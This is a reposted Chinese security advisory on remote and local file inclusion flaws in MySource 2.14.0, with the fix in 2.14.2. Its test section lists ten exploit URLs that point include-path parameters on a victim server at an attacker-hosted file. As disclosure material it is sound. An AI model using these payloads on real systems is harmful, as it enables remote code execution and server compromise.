MySource多个远程文件包含漏洞

2008-04-11 09:35:30来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

MySource多个远程文件包含漏洞

发布日期:2005-10-19
更新日期:2005-10-19

受影响系统:
MySource MySource 2.14.0 RC2
MySource MySource 2.14.0
不受影响系统:
MySource MySource 2.14.2
描述:
BUGTRAQ ID: 15133

MySource是一款功能强大的内容发布和管理系统。

MySource中存在多个远程和本地文件包含漏洞,远程攻击者可能利用此漏洞在主机上执行任意命令。

由于没有正确的验证用户输入,攻击者可以从外部和本地资源包含进任意文件,或在用户浏览器中执行任意HTML和脚本代码。

<*来源:Secunia Research

链接:http://secunia.com/secunia_research/2005-51/advisory/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://[victim]/web/edit/upgrade_functions/new_upgrade_functions.php?INCLUDE_PATH=http://[host]/[file]?
http://[victim]/web/edit/upgrade_functions/new_upgrade_functions.php?SQUIZLIB_PATH=http://[host]/[file]?
http://[victim]/web/init_mysource.php?INCLUDE_PATH=http://[host]/[file]?
http://[victim]/pear/Net_Socket/Socket.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/HTTP_Request/Request.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Mail/Mail.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Date/Date.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Date/Date/Span.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Mail_Mime/mimeDecode.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Mail_Mime/mime.php?PEAR_PATH=http://[host]/[file]?

建议:
临时解决方法:

* 将"register_globals"设置为"Off",确保从web根目录移除了MySource安装。

厂商补丁:

MySource
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

MySource Upgrade mysource-2.14.2.tar.gz
http://mysource.squiz.net/__data/page/1015/mysource-2.14.2.tar.gz

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:7-Zip ARJ文件处理溢出漏洞

下一篇:Snort Back Orifice预处理器远程栈溢出漏洞